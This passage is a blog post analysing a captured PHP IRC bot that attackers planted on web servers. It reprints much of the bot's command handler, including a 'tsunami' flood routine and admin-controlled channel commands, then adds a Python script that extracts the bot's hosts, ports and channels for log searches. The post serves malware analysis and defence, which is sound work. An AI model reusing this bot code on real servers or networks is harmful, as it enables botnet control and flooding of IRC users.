fputs($fp,'PRIVMSG '.$chan.' :ACTION slaps '.$com[4].' Jembut Raimu wani karo bosku around a bit with a large trout'. CRL);
}
elseif ($com[3]==':`msg' && $com[4] && $com[5]) {
$msg = strstr($data,":`msg");
$msg = str_replace(":`msg $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg. CRL);
}
elseif ($com[3]==':`notice' && $com[4] && $com[5]) {
$msg = strstr($data,":`notice");
$msg = str_replace(":`notice $com[4] ","",$msg);
fputs($fp,'NOTICE '.$com[4].' :'.$msg. CRL);
}
elseif ($com[3]==':`ctcp' && $com[4] && $com[5]) {
$msg = strstr($data,":`ctcp");
$msg = str_replace(":`ctcp $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg.''. CRL);
}
elseif ($com[3]==':`ping' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PONG!_ '.$sml. CRL);
}
elseif ($com[3]==':`pong' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PING!_ '.$sml. CRL);
}
elseif ($com[3]==':`info' && $auth["$dNick"]["status"]=="Admin") {
$bhost = $SERVER['HTTPHOST'];
$bphp = $SERVER['PHPSELF'];
fputs($fp,'NOTICE '.$dNick.' :Bot Host: '.$bhost.', Bot PHP: '.$bphp. CRL);
}
elseif ($com[3]==':`up' && $chan) {
fputs($fp, 'PRIVMSG chanserv@services.dal.net
p '.$chan.' '.$nick . CRL);
}
elseif ($com[3]==':`down' && $chan) {
fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL);
}
elseif ($com[3]==':`tsunami' && $com[4] && $auth["$dNick"]["status"]!="user") {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
if (substr($dCommand,0,3)=='433') {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
}
$msg = strstr($data,":`tsunami");
$msg = str_replace(":`tsunami $com[4]","",$msg);
if (ereg("#", $com[4])) {
fputs($fp, 'JOIN '.$com[4] . CRL);
}
fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'__________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'___________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :TSUNAMI '.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'__________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'___________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :FLOOD '.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
if (ereg("", $com[4])) {
fputs($fp, 'PART '.$com[4].' :Complete' . CRL);
fputs($fp, 'NICK '.$nick . CRL);
} else {
fputs($fp, 'NICK '.$nick . CRL);
}
}
elseif ($com[3]==':`cycle' && $chan && $auth["$dNick"]["status"]!="user") {
$msg = strstr($data,":`cycle");
if (ereg("", $com[4])) {
$partchan = $com[4];
$msg = str_replace(":`cycle $com[4]","",$msg);
} else {
$partchan = $chan;
$msg = str_replace(":`cycle","",$msg);
}
if (strlen($msg)<3) {
$msg = '';
}
fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
fputs($fp, 'JOIN '.$partchan . CRL);
}
elseif ($com[3]==':`part' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`part");
if (ereg("#", $com[4])) {
$partchan = $com[4];
$msg = strreplace(":`part $com[4]","",$msg);
} else {
$partchan = $chan;
$msg = str_replace(":`part","",$msg);
}
if (strlen($msg)<3) {
$msg = '';
}
fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
$remchan = strtolower($partchan);
if (inarray($remchan, $channel)) {
$channels = str_replace("$remchan ","",$channels);
unset($channel);
$channel = explode(" ", $channels);
}
foreach ($channel as $v) {
fputs($fp, 'JOIN '.$v . CRL);
}
}
elseif ($com[3]==':`join' && $com[4] && $auth["$dNick"]["status"]=="Admin") {
if (!ereg("",$com[4])) { $com[4]="".$com[4]; }
$addchan = strtolower($com[4]);
if (!in_array($addchan, $channel)) {
$channel[]=$addchan;
$channels.="$addchan ";
}
foreach ($channel as $v) {
sleep(rand(1,6));
fputs($fp, 'JOIN '.$v . CRL);
}
}
elseif ($com[3]==':`botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") {
$nick = $com[4];
$identify = $com[5];
fputs($fp, 'NICK '.$nick . CRL);
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
}
elseif ($com[3]==':`k' && $com[4] && $chan) {
$msg = strstr($data,":`k");
$msg = str_replace(":`k $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
}
elseif ($com[3]==':`kb' && $com[4] && $chan) {
$msg = strstr($data,":`kb");
$msg = str_replace(":`kb $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL);
}
elseif ($com[3]==':`ganti') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
if (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
}
elseif ($com[3]==':`op' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`deop' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`v' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`dv' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`awaymsg' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`awaymsg");
$msg = str_replace(":`awaymsg","",$msg);
if (strlen($msg)<3) {
$raway="on";
fputs($fp,'AWAY : ' . 'AWAY' . CRL);
} else {
$raway="off";
fputs($fp,'AWAY : ' . $msg . CRL);
}
}
elseif ($com[3]==':`mode' && $com[4] && $chan) {
fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL);
}
elseif ($com[3]==':`nickmode' && $com[4]) {
$nickmode = $com[4];
fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL);
}
elseif ($com[3]==':`chanlist') {
fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL);
}
elseif ($com[3]==':`userlist') {
$userlist="";
foreach ($auth as $user) {
if ($user["pass"]) { $pass="-pass ok"; }
else { $pass="-no pass"; }
$userlist .= $user["name"].'('.$user["status"].$pass.') ';
}
fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL);
}
elseif ($com[3]==':`quit' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`quit");
$msg = str_replace(":`quit","",$msg);
if (strlen($msg)>3) {
$msg = str_replace(" ","",$msg);
}
$quit1 = array("ngantor","nguantuk","sama","brb","byeall","s33_you","excess_flood","pingtimeout","hehe","bye","mandi","makan","muuah","quit","conection_reset_bay_peer","banned","part","leaving","ada_deh","call_me","wew","toronto.hub.dal.net_brodway.dal.net","no_komen","restart");
$quitmsg = $quit1[rand(0,count($quit1) - 1)];
fputs($fp, 'QUIT ' . $quitmsg . CRL);
$keluar = 1;
exit;
}
elseif ($com[3]==':`vhost' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]) { $localhost = $com[4]; }
else { $localhost = 'localhost'; }
$keluar = 0;
fputs($fp, 'QUIT ' . CRL);
}
elseif ($com[3]==':`jump' && $auth["$dNick"]["status"]=="Admin") {
if (!eregi(".dal.net",$com[4])) {
$remotehost = "irc.dal.net";
} else { $remotehost = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT changging_server' . CRL);
}
elseif ($com[3]==':`ident' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
$username = $username;
} else { $username = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_ident' . CRL);
}
elseif ($com[3]==':`fullname' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
$realname = "--";
} else { $realname = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_fullname' . CRL);
}
elseif ($com[3]==':`topic' && $com[4] && $chan) {
$msg = strstr($data,":`topic");
$msg = str_replace(":`topic ","",$msg);
fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL);
}
elseif ($com[3]==':!help' && !$chan) {
fputs($fp,'PRIVMSG '.$dNick.' :Secret Help' . CRL);
}
} else { fputs($fp,'NOTICE '.$dNick.'
lease Auth First! Type: auth <your pass> To Authorized '. CRL); }
}
}
elseif (!$auth["$dNick"] && !eregi("auth",$iText)) {
if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join ",$iText)) {
if (!ereg("",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '. $Admin .' :4inviter: ' . $dFrom . '2:' .$iText. CRL);
}
$inv = strstr($dFrom,'@');
foreach ($auth as $user) {
if ($user["status"]=="user") {
fputs($fp, 'NOTICE '.$user["name"].' :KB '.$chan.' '.$dNick.' '.$inv.'' . CRL);
}
}
}
}
elseif (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '.$Admin.' :6' . $dFrom . '12:' .$iText. CRL);
}
}
}
}
}
elseif (substr($data,0,4) == 'PING') {
fputs($fp,'PONG ' . substr($data,5) . CRL);
$smile = $querym[rand(0,count($querym) - 1)];
$kata1 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$kata2 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
fputs($fp,'PRIVMSG #whatz :' . $kata1 . ' ' . $kata2 . $smile . CRL);
}
}
}
fclose ($fp);
} while ($keluar==0);
}
working($nick);
?>
Yes, that’s right Nancy, it’s an IRC bot coded in PHP! Quite nice. It appears to give a conduit to a bot master, probably used to upload and execute new scripts. Fortunately, most sites aren’t vulnerable to this relatively old attack. It is interesting, though, that the attacks are clearly aimed at certain types of software that are apparently perceived as vulnerable by the miscreant that is spreading this gunk.
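For triage of a captured script like this one, the connection settings can be read statically, without running it. The following is an added example, not part of the original post: it pulls the server list, port and channel names out of PHP source by resolving the variables passed to fsockopen(). The sample source is a constructed excerpt that reuses the bot's variable names with placeholder values; matching channel variables by "chan" in the name is a heuristic assumption.

```python
import re

# Curly quotes introduced by blog rendering are mapped back to ASCII first.
ASCII_QUOTES = str.maketrans({'\u201c': '"', '\u201d': '"', '\u2033': '"',
                              '\u2018': "'", '\u2019': "'", '\u2032': "'"})

# $name = "literal";   or   $name = array("a", "b");
ASSIGN_RE = re.compile(
    r"""\$(?P<name>\w+)\s*=\s*(?P<rhs>array\s*\(.*?\)|"[^"]*"|'[^']*')\s*;""", re.S)
LITERAL_RE = re.compile(r"""["']([^"']*)["']""")
# $a = $b[...]  (the bot picks one server out of an array this way)
ALIAS_RE = re.compile(r'\$(\w+)\s*=\s*\$(\w+)\s*\[')
SOCK_RE = re.compile(r'fsockopen\s*\(\s*\$(\w+)\s*,\s*\$(\w+)')
VERB_RE = re.compile(r"""["'](NICK|USER|JOIN|PRIVMSG|NOTICE|PONG|MODE|KICK) """)
CHANNEL_RE = re.compile(r"""["'](?:JOIN|PRIVMSG) (#[\w-]+)""")

# Constructed excerpt (placeholder host, channel and admin values).
SAMPLE = '''<?php
$Admin = 'operator1';
$channels = 'chan-placeholder';$remotehst2= array("irc.c2.example","irc2.c2.example");
$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)];
$port = '6667';
$fp = fsockopen($remotehost,$port, $err_num, $err_msg, 30);
$Header = 'NICK '.$nick . CRL;
fputs($fp, $Header);
fputs($fp, 'JOIN ' .$v . CRL);
fputs($fp,'PRIVMSG #room-placeholder :' . $kata1 . CRL);
?>
'''


def _unique(values):
    """De-duplicate while keeping first-seen order; drop empty strings."""
    return [v for v in dict.fromkeys(values) if v]


def extract_indicators(source):
    """Statically recover network indicators from PHP source text."""
    text = source.translate(ASCII_QUOTES)

    literals = {}
    for m in ASSIGN_RE.finditer(text):
        literals.setdefault(m['name'], []).extend(LITERAL_RE.findall(m['rhs']))
    aliases = dict(ALIAS_RE.findall(text))

    def resolve(name, depth=0):
        # Follow "$a = $b[...]" chains until a variable with literals is found.
        if literals.get(name):
            return literals[name]
        if name in aliases and depth < 5:
            return resolve(aliases[name], depth + 1)
        return []

    hosts, ports = [], []
    for m in SOCK_RE.finditer(text):
        hosts += resolve(m[1])
        ports += resolve(m[2])

    channels = [v for name, vals in literals.items()
                if 'chan' in name.lower() for v in vals]
    channels += CHANNEL_RE.findall(text)

    verbs = set(VERB_RE.findall(text))
    return {
        'hosts': _unique(hosts),
        'ports': _unique(ports),
        'channels': _unique(channels),
        'verbs': sorted(verbs),
        # An outbound socket plus IRC registration and messaging verbs.
        'is_irc_bot': bool(hosts) and 'NICK' in verbs
                      and bool(verbs & {'JOIN', 'PRIVMSG'}),
    }


if __name__ == '__main__':
    for key, value in extract_indicators(SAMPLE).items():
        print(f'{key}: {value}')
```

The recovered host and port pairs are what to search for in firewall and proxy logs from the web server itself.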
One comment
Why do you think this is “quite nice”?